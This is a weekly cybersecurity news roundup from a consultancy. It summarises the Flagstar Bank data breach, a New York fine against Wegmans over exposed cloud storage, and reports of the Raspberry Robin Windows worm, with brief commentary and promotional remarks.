Cyber Intelligence Weekly (July 3, 2022): Our Take on Three Things You Need to Know
Welcome to our weekly post where I will be sharing some of the major
developments on the future of cybersecurity that you need to know about.
Make sure to follow my LinkedIn page as well as Echelon’s LinkedIn page to receive updates on the future of cybersecurity!
You can also Subscribe to receive Cyber Intelligence Weekly in your inbox each week.
Before we get started on this week’s CIW, I’d like to share an announcement that we made earlier this week. We are so thrilled to announce that we’ve added Tom Garrubba as our Director of Third-Party Risk Management Services at Echelon. Third-party risk is such an important area of focus, especially in today’s business climate. Ensuring that our clients are adequately handling these risks is one of our top priorities. If you'd like to chat with Tom about your third-party risk program, feel free to reach out or connect with him here: https://www.linkedin.com/in/tomgarrubba/
Away we go!
1. Flagstar Bank Breach Affects over 1.5 Million Customers
Troy, Michigan based Flagstar Bank recently reported a data breach that affected over 1.5 million of their customers and exposed sensitive data such as their social security numbers. This comes a year and a half after Flagstar was involved in a data breach related to the Accellion file sharing application breach.
Per the customer notification letter, Flagstar noted, “After an extensive forensic investigation and manual document review, we discovered on June 2, 2022 that certain impacted files containing your personal information were accessed and/or acquired from our network between December 3, 2021 and December 4, 2021.”
Flagstar did not offer explanation of why the data breach took so long to uncover. This issue is one of the main reasons that makes incident response and mandatory breach reporting so difficult to manage. Breaches like this often go undetected for weeks, or in this case, months.
2. Attorney General James Secures $400,000 From Wegmans After Data Breach Exposed Consumers’ Personal Information
Wegmans, the New York Based supermarket chain was recently in the news after being hit with a $400,000 fine from Letitia James, NY State Attorney General. Per the NYAG, Wegmans left cloud containers open to the internet for years, exposing the sensitive data of many of their customers. Per the release, the exposed data included usernames and passwords for Wegmans accounts, as well as customers’ names, email addresses, mailing addresses, and additional data derived from drivers’ license numbers.
The security holes were discovered by a security researcher who found the misconfigured Microsoft Azure containers, open to the public. The misconfigured storage contained a database backup file with over three million customer records. Per the filing, the containers were open from its creation in January 2018 through April 2021.
Unfortunately, these types of cloud misconfiguration errors are far too common. The 2022 Verizon Data Breach report noted 715 incidents of this variety with 708 containing confirmed data disclosure. Most of the time, these issues stem from infrastructure being stood up in the cloud without ensuring proper access controls are in place. Unfortunately, there is a shortage of cloud security engineers that are qualified to ensure that these environments are being secured properly. Like any new technology, we are no where near a critical mass of acceptable security knowledge in the marketplace yet unfortunately. While many of the major cloud providers have been taking steps to ensure default configurations are more secure than they have been in the past, it has not slowed down the frequency of these types of issues.
The Wegman’s case was brought under New York State Law Section 899-BB, which are guidelines for data security protections. New York has some of the most stringent data security stipulations for all businesses as well as specific stipulations for financial services organizations through their tough 23 NYCRR 500. Other stringent states with data security laws include Massachusetts with Bill H.4806, New Jersey with P.L.2005, c.226 (S. 51) and Maryland with House Bill 1154. We only see these increasing over time with other states across the country.
3. Microsoft Finds Raspberry Robin Worm in Hundreds of Windows Networks
A new report from Bleeping Computer details a recently discovered Windows worm that has been found on the networks of hundreds of organizations across a variety of industries. This story comes on the heels of a Red Canary report from May of earlier this year.
Red Canary first observed this worm back in September of 2021, and they noted that it is often installed via a USB drive. The worm leverages the use of msiexec.exe (Windows Installer) to infect the host by calling out to a malicious command and control (C2) domain. Windows Installer is a software component and API of Microsoft Windows, regularly used for the installation, maintenance, and removal of software.
As in most cases that we see today, legitimate operating system tools are leveraged to carry out malicious attacks in various ways. Therefore, it is so important to have a next generation endpoint protection suite (e.g., CrowdStrike) to analyze the behavior of these legitimate processes as well as layering defenses.
Thanks for reading!
About us: Echelon is a full-service cybersecurity consultancy that offers wholistic cybersecurity program building through vCISO or more specific solutions like penetration testing, red teaming, security engineering, cybersecurity compliance, and much more! Learn more about Echelon here: https://echeloncyber.com/about